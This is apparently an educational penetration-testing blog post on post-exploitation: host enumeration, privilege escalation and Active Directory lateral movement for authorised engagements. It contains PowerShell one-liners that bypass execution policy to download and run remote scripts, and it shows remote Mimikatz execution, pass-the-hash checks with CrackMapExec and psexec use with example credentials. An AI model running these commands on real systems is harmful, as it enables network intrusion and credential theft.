Note - Where's RVAPT 2~5 ?!

The RVAPT blog series were suppose to be updated over the spring break (3/9~3/16). However, due to the corona virus outbreak, my entire schedule and to-do lists have gone through rapid changes.  RVAPT education schedule itself became a bit of mess as well. Thus, I'll be uploading Post-Exploitation and Reporting related topics first, and then later write about topics that RVAPT 2~5 covered - Enumeration and Exploitation.

Background

After hours and days of enumeration and active exploitation, you have finally done it. You are "in". You have compromised one of the target machine and now  you are inside the target's network. Now what? You still have numerous internal subnets, and dozens, if not hundreds more hosts to perform penetration testing on.

Post-Exploitation

Post Exploitation - Priv.Esc + Lateral Movement + Persistence

This is where Post-Exploitation comes in. Post-Exploitation is a "phase to determine the value of the machine compromised and to maintain control of the machine for later use" (PTES). There are four sub-phases to Post-Exploitation:

  • Privilege Escalation - Process of exploiting a vulnerability, misconfiguration, and/or human error to gain elevated access and status within the system

  • Lateral Movement - Progressively moving through a network

  • Persistence - Techniques that can be used to keep access to systems

  • Data Exfiltration - Unauthorized movement of data

As you can see, these four sub-phases are all tied together. Let's say we've just successfully finished exploitation, and got an initial foothold on to a box. In order to perform lateral movement/persistence/data exfiltration, we must have privileged access (thus, Privilege Escalation). After having a privileged access, we can now enumerate and move further into the internal network of the target (lateral movement). While doing so, we would want to plant persistence, just in case we get locked out by the blue teams - so we can always gain access back to the systems again (persistence). Finally, we exfiltrate data - usually in the industry, this will be a form of a fake file/data, called "trophy".

The following sections will go over two different sub phases of Post-Exploitation: Privilege Escalation and Lateral Movement. Please note that this blog post is no way even close to covering each of the sub phases. However, I will leave some resources/links at the bottom for reference and further research purposes.

But first, the Basics

Before moving on to the various sub phases, we first have to get the basics right. This includes gaining basic understanding of the current machine after the inital exploitation.

It is crucial to perform the basic enumeration, in order to stop going down the rabbit hole. A quick 2~3 minutes and couple of commands can save you lots of time.

# Whoami? What privileges do I have? 
id 
whoami 
whoami /all

# Which machine am I on? 
hostname
hostnamectl
lsb_release -a 
cat /etc/issue 
cat /etc/os-release 

# Where am I? - Subnet / Domain 
ip a
ipconfig /all 
Get-ADDomain 

# Am I in a virtualized environment? - Look for "docker"
cat /proc/self/cgroups 
cat /proc/1/cgroups 
ls -alh / | grep .dockerenv 

# What processes are running? 
ps faux 		// linux 
tasklist /v 		// cmd 
Get-Process 		// Powershell 

# What ports are opened? 
netstat -tulpna 	// linux 
netstat -ano 		// windows 

# Who am I talking with? - Layer 2 
arp -a 

Privilege Escalation

Privilege Escalation (privesc) is a process of exploiting a vulnerability, misconfiguration, and/or human error in order to gain elevated access and status within the system. Privesc is essential phase of post-exploitation, as modern operating systems will always have access control. Thus, in order to do anything "interesting", such as lateral movement, persistence, and data exfiltration, privesc needs to be done first.

There really isn't a magical methodology for privesc; every machine is configured very differently. The general rule of thumb is to find anomalies. Usually when there is something "not default" in a box, it has the potential to be exploited. These include, but are not limited to...

< Finding Anomalies >

  • Outdated 3rd party applications
  • Custom Applications & Scripts
  • Wrong file permission
  • Wrong service permission, service misconfiguration
  • Scheduled task
  • Plaintext credentials and/or sensitive information stored in a file
  • Mounted filesystems, Network File Sharing shares
  • Human Error - ("meh I'm just going to save this MyWorkPassword.txt on my desktop")

( There is no way this blog post will cover all of these topics. There will be links/resources down at the bottom, on going over these different privesc vectors. )

One of the best ways to figure out this anomalies is to actually install and run operating systems from scratch.  Remember, you can't break stuff if you never built it first. Usually privesc skills comes with experience. The more systems you go into and take a look around, the better you will become at finding these anomalies and taking advantage of it.

There are some tools which will automate finding some of the anomalies in the system as well. Make sure not to write on-disk of your client's machine as much as possible. If writing on disk is inevitable, make sure to document all the artifacts, clean them up after usage, and make sure to write the files on temporary directories (/tmp, /dev/shm) just to be safe.

Privesc Tools - Linux

Privesc Tools - Windows

Lateral Movement

Quick Note: Some of the tools and enumerations done in this section will not be operationally secure. I.E) If you do this in a real engagement, you will be setting off quite a lot of alerts in the SIEM.

Lateral movement is a technique that attackers use in order to progressively move through the target network. This includes accessing machines in the same network as well as accessing machines in other networks, domains, etc. As modern IT networks are built upon Windows Active Directory (and the "cloud", but that is not in scope of this post), this section will focus Windows AD environment as well.

Before diving deep into the Windows Active Directory (AD), one can learn a lot about the environment just by doing a basic enumeration. Usually this comes in the form of hostname and domain name. For example, if we have just landed in a "joe.finance.newyork.company.local", this tells us what kind of a machine it is (workstation of joe), what department we are on, what office branch, and more.    

# Take a close look at the hostname - it gives lots of information 
hostname 
[System.Net.DNS]::GetHostByName($env:computerName)

# Check the domain and forest information
Get-ADDomain 
Get-ADForest 

# Check connected domains 
ipconfig /all 

After basic information has been retrieved, it's time to enumerate the internal network. Note that the methodology and scripts used in this blog post will be very noisy and not operationally secure. Moreover, powershell is being heavily monitored and hardened by the blue team nowadays; expect to handle Windows Defender, Constrained Language Mode, AMSI, Deep Script block logging, and EDR solutions while using the following methods. As lateral movement usually occurs with local Administrative privilege, there will be ways to get pass those defense mechanisms.

Lateral Movement - Enumeration

For enumeration, Powerview.ps1 and/or Microsoft's official AD-module can be used. For Powerview, all of the commands will have "Net" keyword (Get-NetComputer), and Microsoft's official AD module will have "AD" keyword (Get-ADComputer).

# Inject PowerView enumeration script into the current session 
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/situational_awareness/network/powerview.ps1')"

# Inject Microsoft's AD Module into the current session 
powershell.exe -c exec Bypass -noexit -C "iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory" 

# Gain AD information 
Get-ADDomain 
Get-NetDomain 

# Find specific users 
Get-ADUser -Identity <username>
Get-NetUser -Username <username> 

# Find interesting builtin users 
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description

# Get all groups containing the word "admin"
Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name 

# Get members of Domain Admin group - or any group you want 
Get-NetGroupMember -GroupName "Domain Admins" -Recurse 
Get-ADGroupMember -Identity "Domain Admins" -Recursive

# Get group membership for a user 
Get-NetGroup -UserName "student1"
Get-ADPrincipalGroupMembership -Identity student1

# Find if current user has local Administrator privilege (powerview)
Find-LocalAdminAccess -Verbose 

# Find shares on hosts 
Invoke-ShareFinder -Verbose (-ExcludeStandard/IPC/Print)

# Find sensitive files 
Invoke-FileFinder -Verbose 

# Find fileservers
Get-NetFileServer 

Lateral Movement - ... Movement!

With all of the information we found through enumeration, it's time to move. There are two major ways to move through the Active directory. The first one is to use PSRemoting, which uses WinRM. Second method is to use PSExec, which uses the SMB protocol underneath. For other lateral movement methods, please look at the resources section below.

PS Remoting

Based on Microsoft's documentation, PS Remoting lets "computer to receive PowerShell remote commands that are sent by using the WS-Management technology." (link) Basically, you can think of it has a default SSH for Windows AD environment machines. Since it does require the remote computer to have WinRM running, it would be a nice idea to scan the network for open 5985, 5986 (HTTP WinRM / HTTPS WinRM) ports then perform PS Remoting. Moreover, the remote machine needs to have "Enable-PSRemoting" configured in order to use psremoting.

# Create a new session 
$sess New-PSSession -Computername <FQDN/IPaddress> -Credentials <domain\username> 

# Actually enter the session 
Enter-PSSession -Session $sess 

# Enter interactive PS Remoting session right away
Enter-PSSession -Computername <FQDN or IPaddress> -Credentials <domain\username>

# Send out command to multiple hosts at once 
Invoke-Command -computername target1,target2,taget3,... -Scriptblock{<powershell_code>} -Credentials 

# Send out command to multiple hosts from a file 
Invoke-Command -Computername (Get-Content <host_file.txt>) -Scriptblock{<powershell_code>} -Credentials

# Execute locally loaded module's function on remote machines 
Invoke-Command -Computername <target> -ScriptBlock ${function:Invoke-Mimikatz} 

PSExec & SMB

SMB (Server Message Protocol) is widely known as a protocol which allows machines to share files and printer. As such, it's common to think that only file read/write is possible through SMB. It's true that pure code/command execution is not possible through the SMB. However, it is possible to copy over a windows service executable, register & run the windows service and have command execution through that. And PSExec is a famous sysinternal tools that will perform the task for us, automatically.

There are other versions of PSExec as well, such as the powershell version Invoke-PSExec, Metasploit's PSExec meterpreter post-exploitation module, Impacket (python)'s psexec.py, and so on.

Before using PSExec, there are several prerequisites that needs to be checked.

  1. Are there any hidden network shares?
  2. Are there any open shares in general?
  3. If there are, do we have access? Are the shares allowing read/write permission?
  4. We do have the right credentials with the right privilege (Local Administrator / Domain Admin) for the target machine? Do you have plaintext credentials? Do you have NTLM(or just NT) hash?
  5. Are there shares allowing guest logon / null sessions? - (This should not happen in 2020, but you never know)

And a great way to check these prerequisites is through a tool called CrackMapExec  by Marcello Salvati (a great Red teamer btw)

# If using kali, installation is simple 
sudo apt-get install -y crackmapexec 

# If not, check out the github repo & wiki
https://github.com/byt3bl33d3r/CrackMapExec

# Check SMB access using plaintext credentials 
crackmapexec smb <target(s)> -u <username> -p <password> 

# Check SMB access using Pass-the-Hash 
crackmapexec smb <target(s)> -u <username> -H LMhash:NThash 

# Testing for null sessions
crackmapexec smb <target(s)> -u '' -p ''

Now that you have the credentials, permissions, shares, and target all lined up, using psexec is as simple as downloading sysinternals and running it. Or you could use metasploit, Impacket, whatever.

# Using psexec, from windows cmd or powershell console 
./psexec.exe \\<FQDN or ipaddress> -u <username> -p <password> <command to run> 
./psexec.exe \\192.168.1.1 -u choi.local\Administrator -p Password123! powershell.exe 

Cautionary Note

If you think finding sensitive files from public facing webapp, websites, shares were bad, you have not seen the things you can find through post-exploitation. Penetration Testers and Red teamers can stumble upon Personally Identifiable Information, Financial data, sensitive files, and more, through post-exploitation. Potentially, any digital data that the client owns can be found in the internal network.

Thus, it is crucial to always report to your team and point of contact when you find sensitive information. Always becareful and respect your client's data. Be extremely careful  - often it is best not to access the data in anyways, and just report it. If accessing the data is inevitable because for having a proof, try to access as little client data as possible. For example, you don't need to take a screenshot of 30 different PII to prove that you have database access. Just take 1 record, redact all sensitive information. A proof is a proof.

Closing Thoughts

If getting initial foothold through external enumeration and exploitation was a warm-up, post-exploitation can be considered to be the main game. Be noted that the industry and corporate networks are getting more secured by the year (which is a good thing). This means more companies have dedicated SIEM, teams, budget, products, monitoring system, custom scripts, platforms, and much more.

An external attacker only needs to find a single weakest link to exploit the defender. However once inside the defender's network, the defender only needs to find a single mistake from the attacker to detect and kick the attacker out. Be aware of what you type once you are inside!  

This wraps up the post-exploitation phase. The next post will be related with Penetration testing reporting. The mini competition infrastructure is almost done and is on the testing phase as of right now. See you later!

Windows privesc - FuzzSecurity

Windows privesc - 2 - guif.re

Linux privesc - g0tmi1k

Privilege Escalation mindset - nice non-technical read

Lateral Movement Methods - Windows